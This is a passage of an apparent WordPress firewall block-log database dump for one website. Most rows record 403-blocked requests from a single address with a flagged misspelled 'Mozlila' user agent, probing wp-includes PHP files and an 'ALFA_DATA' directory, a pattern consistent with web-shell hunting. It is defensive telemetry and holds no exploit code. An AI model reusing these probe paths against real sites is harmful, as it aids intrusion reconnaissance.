User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LWdsb2JhbC1zdHlsZXMtcmV2aXNpb25zLWNvbnRyb2xsZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133931,1699931775.375063,1699931775.365900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-partial.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtcGFydGlhbC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133932,1699931769.865280,1699931769.852100,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-new-menu-section.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtbmV3LW1lbnUtc2VjdGlvbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133933,1699931766.156342,1699931766.147500,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-new-menu-control.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtbmV3LW1lbnUtY29udHJvbC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134102,1699994976.614764,1699994976.599600,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/ALFA_DATA/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0FMRkFfREFUQS8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133948,1699932291.597357,1699932291.588600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-menu-items-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LW1lbnUtaXRlbXMtY29udHJvbGxlci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133934,1699931760.713129,1699931760.693500,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-nav-menus-panel.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtbmF2LW1lbnVzLXBhbmVsLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133935,1699931754.320455,1699931754.309000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-nav-menu-setting.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtbmF2LW1lbnUtc2V0dGluZy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133936,1699931747.980022,1699931747.971200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-nav-menu-section.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtbmF2LW1lbnUtc2VjdGlvbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134031,1699932886.759241,1699932886.750400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-media-image.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LW1lZGlhLWltYWdlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133947,1699932296.932742,1699932296.923000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-menu-locations-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LW1lbnUtbG9jYXRpb25zLWNvbnRyb2xsZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133937,1699931743.910688,1699931743.896300,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-nav-menu-name-control.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtbmF2LW1lbnUtbmFtZS1jb250cm9sLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133938,1699931738.889723,1699931738.881000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-nav-menu-locations-control.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtbmF2LW1lbnUtbG9jYXRpb25zLWNvbnRyb2wucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133946,1699931942.543048,1699931942.520200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/html-api/class-wp-html-token.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2h0bWwtYXBpL2NsYXNzLXdwLWh0bWwtdG9rZW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133939,1699931733.292220,1699931733.283400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-nav-menu-location-control.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtbmF2LW1lbnUtbG9jYXRpb24tY29udHJvbC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133940,1699931728.639028,1699931728.630300,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-nav-menu-item-setting.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtbmF2LW1lbnUtaXRlbS1zZXR0aW5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133941,1699931722.720570,1699931722.711700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-nav-menu-item-control.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtbmF2LW1lbnUtaXRlbS1jb250cm9sLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133945,1699931947.094686,1699931947.085600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/html-api/class-wp-html-unsupported-exception.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2h0bWwtYXBpL2NsYXNzLXdwLWh0bWwtdW5zdXBwb3J0ZWQtZXhjZXB0aW9uLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133942,1699931712.638971,1699931712.627900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-nav-menu-control.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtbmF2LW1lbnUtY29udHJvbC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134032,1699932882.781802,1699932882.773000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-media-gallery.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LW1lZGlhLWdhbGxlcnkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133943,1699931707.375101,1699931707.366100,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtbmF2LW1lbnUtYXV0by1hZGQtY29udHJvbC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133944,1699931968.242833,1699931968.220800,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/images/wp-includes/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ltYWdlcy93cC1pbmNsdWRlcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133967,1699932130.272858,1699932130.264200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/pomo/translations.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3BvbW8vdHJhbnNsYXRpb25zLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134023,1699932622.112762,1699932622.104000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sodium_compat/lib/sodium_compat.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NvZGl1bV9jb21wYXQvbGliL3NvZGl1bV9jb21wYXQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133968,1699932124.344414,1699932124.325000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/pomo/streams.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3BvbW8vc3RyZWFtcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133969,1699932120.808888,1699932120.799700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/pomo/po.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 